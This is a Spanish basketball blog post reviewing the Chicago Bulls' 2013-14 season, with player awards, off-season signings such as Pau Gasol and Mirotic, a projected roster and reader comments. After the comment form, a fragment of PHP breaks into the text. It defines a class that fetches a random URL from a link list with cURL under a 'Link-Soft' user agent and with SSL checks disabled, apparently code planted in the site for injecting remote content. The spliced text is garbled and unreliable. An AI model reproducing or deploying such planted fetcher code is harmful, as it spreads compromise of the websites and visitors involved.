Chicago Bulls: Bien

21 de July de 2014 por TheDeerHunter

derrick rose Campaña extremadamente complicada para la mítica franquicia del toro, de tintes cuasi trágicos debido a la segunda grave lesión de rodilla de Derrick Rose tras sólo 10 partidos oficiales disputados. La resolución de los contratos de pesos pesados como Luol Deng o Carlos Boozer tampoco han contribuido a la mejor predisposición competitiva. Con todo, si de algo nadie puede quejarse en Chicago es de la actitud frente las dificultades. Han conseguido nada menos que 48 victorias y situarse en la parte alta del cuadro gracias a practicar la mejor defensa de la liga. Por desgracia este año no fueron el hueso duro de roer al que nos tenían acostumbrados y claudicaron de forma clara en playoffs ante un equipo a priori inferior. Nos quedaremos con las ganas de ver en todo su esplendor una de las escuadras más potentes que se han diseñado en la liga durante el pasado lustro pues el proyecto ha mutado definitivamente.

En ausencia de un líder de la talla de Rose y de un jugador con la ascendencia de Luol Deng, traspasado en cuanto se vislumbró el panorama, otros han dado un paso adelante. Son los típicos “conejos” que suele sacarse Tom Thibodeau de la chistera. Dos nombres propios destacan por encima del resto: por un lado Joakim Noah, del que ya conocíamos su entrega pero no un impacto en el juego de tal envergadura, indiscutible mejor defensor del año e inesperado candidato al MVP. El otro, Taj Gibson, cuya eclosión definitiva ha sorprendido a muchos. Estuvo hasta el último momento en las quinielas a mejor 6º hombre y este temporada ha añadido a su impecable defensa un gran impacto ofensivo. El jugador más utilizado de toda la liga en los últimos cuartos devorando claramente a Carlos Boozer. Noah y Gibson no sólo han sido dos grandes protagonistas de los Bulls este curso sino de toda la liga. 

Comentario aparte merece DJ Augustin, que venía de mendigar apenas 8 minutos de juego en Toronto tras un año infausto en Indiana, arrastrándose cuesta abajo en una carrera directa a Europa… o a Asia. En Chicago, sin embargo, se ha destapado como un jugador fundamental en la mejor campaña de su vida. Muy cómodo saliendo desde el banco, lanzando mejor que nunca y distribuyendo con criterio. Algunos aseguran incluso que le han visto defender. Su caso es casi un milagro que su cuenta corriente agradecerá y su plaza en la mejor liga del mundo también. Resurrecciones semejamentes no son del todo casualidad en Chicago.

Pero no todo el monte es orégano, como decíamos. Dejando a un lado el tema Rose, que deja tambaleando el futuro de la franquicia, y el primer cuarto de liga que dejó Luol Deng, algunos no han terminado de estar a la altura. Se veía venir y uno de los protegidos de un sector del blog, Carlos Boozer, ha terminado claudicando ante sí mismo. En una cosa todos estaremos de acuerdo y es que se esperaba mucho más de él de lo que ha ofrecido, especialmente su último año en Chicago, en el que no ha pasado de ser un mediano jugador. Quizá le vaya bien el cambio de aires porque nunca ha terminado de conectar con aquella parroquia. Tampoco nos hemos quedado del todo satisfechos con la evolución de Jimmy Butler. Nadie se puede quejar de su desempeño, incansable casi 40 minutos por partido, pero vistos su anteriores playoffs esperábamos algo más que un (excelente) especialista defensivo de perímetro. Tampoco Mike Dunleavy ni Kirk Hinrich han terminado de brillar.

Así las cosas, la regular fue francamente buena dadas las circunstancias pero el equipo llegó muy justo a la hora de la verdad. Thibodeau se la terminó jugando con 7 hombres ante unos Wizards que demostraron al mundo que ya son una realidad y fueron claramente superiores. El desgaste pudo con las ganas y, si no funcionaron los sistemas defensivos, mucho menos lo iban a hacer los ofensivos. Punto final a una temporada digna pero amarga.

PREMIOS

MVP: Evidente. Joakim Noah (12’6p – 11’3r – 5’4a – 1’5t – 1’2rb) se coló en medio de súper-hombres como Kevin Durant y LeBron James en muchas quinielas al MVP. No había color pero tiene un mérito enorme pues ha sido considerado por muchos como el tercer mejor jugador del año. Al final se llevó el premio al mejor defensor, donde tampoco nadie resistía la comparación con un estilo muy parecido al Marc Gasol del año pasado. Inteligencia y generosidad por encima de todo. La esencia del MVP.

Rookie: Sólo dos. Erik Murphy, que no ha contado prácticamente, y Tony Snell que sí ha dejado algunas sensaciones interesantes.

Sorpresa: Ni los más optimistas esperaban el desempeño mostrado por DJ Augustin (14’9p – 5’0a). A ver qué versión le vemos en Detroit pero si Thibodeau es capaz de sacar tal partido a un jugador de su perfil qué es lo que logrará con Pau Gasol o Mirotic…

Decepción: La lesión de Derrick Rose está fuera de concurso. Los 4 años de Carlos Boozer en Chicago terminan sin pena ni gloria, con un rendimiento muy por debajo de su talento y habiendo perdido el sitio ante un jugador con muchos menos recursos como es Gibson. Sus últimos playoffs con esta camiseta fueron indescriptibles. Es triste decirlo pero no le van a echar demasiado de menos en el United. Conviene recordar que durante estos 4 años ha venido a cobrar más de 60 millones de dólares.

Esfuerzo en vano: Jimmy Butler (13’1p – 4’9r – 26a – 1’9rb) comparte con Carmelo Anthony el primer puesto de la liga de minutos disputados con 38’7. Su aportación estadística no se corresponde con este dato. La intendencia personificada o el jugador más oscuro de la liga.

JUGANDO A GM

No se pueden quejar demasiado los Bulls de cómo ha terminado la caza este verano. No se han hecho con Melo pero se han hecho con Pau Gasol, otro de los agentes libres más demandados, por un precio razonable. Mucha gente piensa que le hacía falta un cambio de aires y ésta es una fantástica oportunidad para recuperar sensaciones. En forma y jugando junto a un jugador tan polivalente como Noah podrían convertirse en una de las mejores parejas interiores de la conferencia.

Llega a la liga, por fin, Niko Mirotic. También ha sido un año complicado para él. En condiciones normales debería ganarse sobradamente esa mid-level por la que ha firmado, aunque conviene recordar que en teoría tiene por delante nada menos que a Gasol y a Gibson. No sabemos si Thibodeau se atreverá a hacerle jugar de tres. Otro sonado rookie que llega a Chicago es Doug McDermott, pasote de anotador de NCAA del que incluso han surgido comparaciones con el mismísimo Larry Bird (o worst case Fredette). Tendrá que comer unas cuantas lentejas para llegarle a las suelas al “Pájaro”. Mientras tanto, hay dudas más que razonables sobre su adaptación a esta competición.

Con la más que posible renovación de Hinrich, el equipo está bastante bien armado, a falta de otro base más (por si las moscas) y quizá algún otro jugador de perímetro. Dado que Pau puede turnarse de pívot nato y lo poco proclive que es Thibodeau a rotar mucho, no creemos que haga falta ningún otro interior. De ser así podría intentarse volver a traer a Brand.

Con esto no sabemos si se alcanza para ser contendiente, porque al final todo depende del estado de forma físico del que marca la diferencia de la plantilla. Como sabemos, los antecedentes no son nada halagüeños.

PG: Derrick Rose, Kirk Hinrich
SG: Jimmy Butler, Tony Snell
SF: Mike Dunleavy, Doug McDermott
PF: Taj Gibson, Pau Gasol, Nikola Mirotic
C: Joakim Noah, Cameron Bairstow

Comenta

6 comentarios a esta entrada

  1. Vader dice:
    #1

    Yo creo que los Bulls van a mejorar mucho este año que viene, independientemente de Rose. Si ademas este vuelve sano los pongo como aspirantes al anillo.

    El juego interior es brutal ¿El mejor de la liga? Si con Noah ya tenían un gran pasador con Gasol ganan otro, más Gibson y Mirotic. Estoy seguro que Gasol hará un gran año, lo veo con hambre. Por primera vez ha podido elegir destino y se ha ido a los Bulls, el equipo que mejor y con más intensidad defiende, él, Gasoft… Lo veo con ganas de cerrar bocas. Como si a estas alturas le hiciera falta.

    En las alas Butler seguirá siendo un seguro atras y Dunleavy (creo que sigue) rindio muy bien el año pasado. McDermott parece muy preparado y sin duda ayudará mucho en ataque, donde el equipo más lo necesita.

    Y para el puesto de base lo dicho, con un Hinrich serán un gran equipo, pero con Rose sano serán claros aspirantes a las finales del este junto a Cleveland y Miami (a ver que pasa con Indiana).

    Rose, Butler, McDermott, Gasol, Noah

    + Hinrich, Dunleavy, Gibson, Mirotic, Snell.

    Plantillón, gran entrenador y que esta vez no tendrá excusa para dosificar un poco a sus hombres, por lo menos en la RS.

    Saludos

      Citar

  2. Esteban dice:
    #2

    Vader: Citar

    es cierto lo de su juego interior, pero todas sus epseranzas estan en que vuelva Rose y que lo haga a enorme nivel, no hay que olvidarse que ya no esta Deng, para mi tendran un buen año pero poco mas

      Citar

  3. Ruxixon dice:
    #3

    A mí me falta otro base para generar un poco de juego por sí mismo y que sea mejor defensor que Hinrich,que está para los leones el pobre.El resto del equipo perfecto,y estoy con Vader sobre las sensaciones que desprenden los Bulls.Salvo que los Cavaliers consigan a Love,para mí favoritos nº1 para liderar el Este en la RS,y ese McDermott que en otro sistema (en un estilo de juego más rápido) quizás haría números para aspirar al ROY,pero creo que aunque pueda brillar un poco menos estadísticamente si que va a conseguir hacerse un hueco desde el minuto 1 en la NBA.Encaja como un guante en el equipo.

      Citar

  4. rumbero dice:
    #4

    Ruxixon:
    A mí me falta otro base para generar un poco de juego por sí mismo y que sea mejor defensor que Hinrich,que está para los leones el pobre.El resto del equipo perfecto,y estoy con Vader sobre las sensaciones que desprenden los Bulls.Salvo que los Cavaliers consigan a Love,para mí favoritos nº1 para liderar el Este en la RS,y ese McDermott que en otro sistema (en un estilo de juego más rápido) quizás haría números para aspirar al ROY,pero creo que aunque pueda brillar un poco menos estadísticamente si que va a conseguir hacerse un hueco desde el minuto 1 en la NBA.Encaja como un guante en el equipo.

    A McDermott solo lo conocía por lo bien que hablábais de él los que controláis del tema, pero me ha dado por seguir un poco la Summer League y el chaval las enchufa que da gusto. Si tiene minutos (cosa probable con Thibs) y da un cierto nivel, puedo tapar un poco esa carencia anotadora que tienen los Bulls desde el exterior. A mi también me gustan estos Bulls

      Citar

  5. txusma dice:
    #5

    No acabo de ver claro eso de que McDermott vaya a ser titular con Thibodeau en el banquillo. Con él los rookies no suelen jugar mucho, dedican ese primer año a empaparse bien de los sistemas y es a partir del 2º o 3º cuando empiezan a contar de verdad. Por otro lado es cierto q McDermott aporta algo que ni Snell, ni Butler hacen.

      Citar

  6. Ruxixon dice:
    #6

    txusma:
    No acabo de ver claro eso de que McDermott vaya a ser titular con Thibodeau en el banquillo. Con él los rookies no suelen jugar mucho, dedican ese primer año a empaparse bien de los sistemas y es a partir del 2º o 3º cuando empiezan a contar de verdad. Por otro lado es cierto q McDermott aporta algo que ni Snell, ni Butler hacen.

    Hombre,no sé qué quinteto puede formar en la línea exterior,pero encajándome más Snell como jugador microondas,quizás por eso pongo a McBuckets en el 5 inicial.Posiblemente se opte por Dunleavy al principio,pero si esa es su única competencia,el rookie acaba ganándose el puesto.Por otra parte considero a Butler como el SG del equipo.Parto de varias premisas que deben ser demostradas en el inicio de la RS,pero a mí me encaja así,reconociendo eso que dices que Thibodeau emplea el primer año para que vayan aprendiendo lo que es la competición.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>